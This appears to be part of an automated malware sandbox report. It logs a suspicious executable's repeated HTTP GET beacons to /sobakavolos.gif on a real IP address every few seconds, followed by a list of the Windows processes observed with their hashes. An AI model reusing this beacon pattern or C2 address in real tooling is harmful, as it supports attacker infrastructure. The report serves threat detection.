                                                                                                          5192.168.2.44974646.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:33.997087955 CET163OUTGET /sobakavolos.gif?387ee8e=177720234 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49747 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:42:38.809829950 CET | 162 | OUT | GET /sobakavolos.gif?4289802=69769218 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49748 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:42:43.838835001 CET | 163 | OUT | GET /sobakavolos.gif?4c8fe82=722530962 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49749 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:42:48.585593939 CET | 163 | OUT | GET /sobakavolos.gif?55ce57c=359896560 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49750 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:42:53.365581036 CET | 163 | OUT | GET /sobakavolos.gif?605f574=707376684 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49752 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:42:58.333689928 CET | 164 | OUT | GET /sobakavolos.gif?6ac3c3a=1007558154 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49759 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:03.133934975 CET | 163 | OUT | GET /sobakavolos.gif?746f30a=366270750 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49774 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:07.914680004 CET | 163 | OUT | GET /sobakavolos.gif?7e81b91=530607684 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49786 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:12.820173979 CET | 163 | OUT | GET /sobakavolos.gif?b40fdb1=566425875 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49797 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:17.573354006 CET | 165 | OUT | GET /sobakavolos.gif?10c254e3=1687027026 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49808 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:22.767539978 CET | 165 | OUT | GET /sobakavolos.gif?16620ca3=1502098060 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49819 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:28.155122995 CET | 166 | OUT | GET /sobakavolos.gif?2700512b=-1677638484 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49834 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:33.046200037 CET | 165 | OUT | GET /sobakavolos.gif?372892a3=1257467858 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49846 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:38.227262020 CET | 164 | OUT | GET /sobakavolos.gif?3d30b7a9=838047309 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49857 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:43.519269943 CET | 166 | OUT | GET /sobakavolos.gif?425e98d5=-1908960002 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49868 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:48.518910885 CET | 166 | OUT | GET /sobakavolos.gif?53792577=-1494070546 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49880 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:53.275218010 CET | 166 | OUT | GET /sobakavolos.gif?590aff39=-1307181454 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49891 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:43:58.102690935 CET | 164 | OUT | GET /sobakavolos.gif?60d9e770=579712592 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49902 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:03.167335987 CET | 165 | OUT | GET /sobakavolos.gif?7ccb59f9=1986137579 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49914 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:08.871280909 CET | 164 | OUT | GET /sobakavolos.gif?8195d24a=265959140 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49925 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:13.804148912 CET | 166 | OUT | GET /sobakavolos.gif?8756340a=-1778213858 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49940 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:18.683655024 CET | 165 | OUT | GET /sobakavolos.gif?8d11c4a2=-174069326 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49951 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:23.593023062 CET | 164 | OUT | GET /sobakavolos.gif?9241e677=612617454 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49962 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:28.456795931 CET | 165 | OUT | GET /sobakavolos.gif?a34963b3=-371447015 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49973 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:33.262223005 CET | 165 | OUT | GET /sobakavolos.gif?a74235ca=-343063876 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49984 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:38.143026114 CET | 165 | OUT | GET /sobakavolos.gif?aea19a18=1564685360 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49995 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:43.021666050 CET | 165 | OUT | GET /sobakavolos.gif?b104bfd4=-685687092 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 50006 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:47.971929073 CET | 165 | OUT | GET /sobakavolos.gif?b4156853=1747636390 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50019 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:53.108802080 CET | 166 | OUT | GET /sobakavolos.gif?b8d36d83=-1675549809 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 50032 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:44:58.338093996 CET | 165 | OUT | GET /sobakavolos.gif?bd601994=2059416360 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 50042 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:03.180468082 CET | 164 | OUT | GET /sobakavolos.gif?c1fee9b0=267865472 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50043 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:08.107234001 CET | 164 | OUT | GET /sobakavolos.gif?c535894d=349578548 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 50044 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:13.254440069 CET | 166 | OUT | GET /sobakavolos.gif?c977e755=-1829777750 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 50045 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:18.511661053 CET | 164 | OUT | GET /sobakavolos.gif?cc9358d1=843932484 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 50046 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:23.393356085 CET | 166 | OUT | GET /sobakavolos.gif?d0255c4e=-1325038046 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50047 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:28.527074099 CET | 166 | OUT | GET /sobakavolos.gif?d42c48fe=-1470590468 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50048 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:33.549978971 CET | 165 | OUT | GET /sobakavolos.gif?d7244def=-503438967 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50049 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:38.932332039 CET | 166 | OUT | GET /sobakavolos.gif?dae7c7e6=-1244688436 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50050 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:44.030368090 CET | 166 | OUT | GET /sobakavolos.gif?deb2d253=-1676118279 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 50051 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:48.852309942 CET | 165 | OUT | GET /sobakavolos.gif?e40c8c88=-937879280 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 50052 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:53.888876915 CET | 164 | OUT | GET /sobakavolos.gif?e7c0a656=226918236 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 50053 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:45:58.724412918 CET | 166 | OUT | GET /sobakavolos.gif?eaf3a57c=-2118786840 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 50054 | 46.105.103.219 | 80 | 7300 | C:\Users\user\Desktop\RHxJqGoGFB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:46:03.644506931 CET | 165 | OUT | GET /sobakavolos.gif?ee5adceb=1926686552 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 46.105.103.219
Cache-Control: no-cache


Target ID: 0
Start time: 05:42:02
Start date: 26/11/2024
Path: C:\Users\user\Desktop\RHxJqGoGFB.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RHxJqGoGFB.exe"
Imagebase: 0x400000
File size: 68'608 bytes
MD5 hash: 4F7FA0B66A6E153089AB00199B04356B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 1
Start time: 05:42:02
Start date: 26/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 05:42:03
Start date: 26/11/2024
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff72c440000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 3
Start time: 05:42:03
Start date: 26/11/2024
Path: C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit): false
Commandline: "fontdrvhost.exe"
Imagebase: 0x7ff72c440000
File size: 827'408 bytes
MD5 hash: BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 4
Start time: 05:42:03
Start date: 26/11/2024
Path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
Imagebase: 0x7ff62bac0000
File size: 1'663'328 bytes
MD5 hash: 9B8DE9D4EDF68EEF2C1E490ABC291567
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 5
Start time: 05:42:03
Start date: 26/11/2024
Path: C:\Windows\System32\dwm.exe
Wow64 process (32bit): false
Commandline: "dwm.exe"
Imagebase: 0x7ff74e710000
File size: 94'720 bytes
MD5 hash: 5C27608411832C5B39BA04E33D53536C
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 7
Start time: 05:42:06
Start date: 26/11/2024
Path: C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\RuntimeBroker.exe -Embedding
Imagebase: 0x7ff71e800000
File size: 103'288 bytes
MD5 hash: BA4CFE6461AFA1004C52F19C8F2169DC
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 8
Start time: 05:42:12
Start date: 26/11/2024
Path: C:\Windows\System32\sihost.exe
Wow64 process (32bit): true
Commandline: sihost.exe
Imagebase: 0x7ff796ef0000
File size: 111'616 bytes
MD5 hash: A21E7719D73D0322E2E7D61802CB8F80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 9
Start time: 05:42:17
Start date: 26/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 05:42:18
Start date: 26/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                                                                                          Target ID:12
                                                                                                          Start time:05:42:19
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\ctfmon.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"ctfmon.exe"
                                                                                                          Imagebase:0x7ff7e3b00000
                                                                                                          File size:11'264 bytes
                                                                                                          MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:13
                                                                                                          Start time:05:42:20
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:16
                                                                                                          Start time:05:42:23
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:17
                                                                                                          Start time:05:42:24
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                          Imagebase:0x7ff7da970000
                                                                                                          File size:793'416 bytes
                                                                                                          MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:18
                                                                                                          Start time:05:42:27
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:19
                                                                                                          Start time:05:42:27
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                          Imagebase:0x7ff6fdaa0000
                                                                                                          File size:3'671'400 bytes
                                                                                                          MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:20
                                                                                                          Start time:05:42:50
                                                                                                          Start date:26/11/2024
                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          Imagebase:0x7ff71e800000
                                                                                                          File size:103'288 bytes
                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
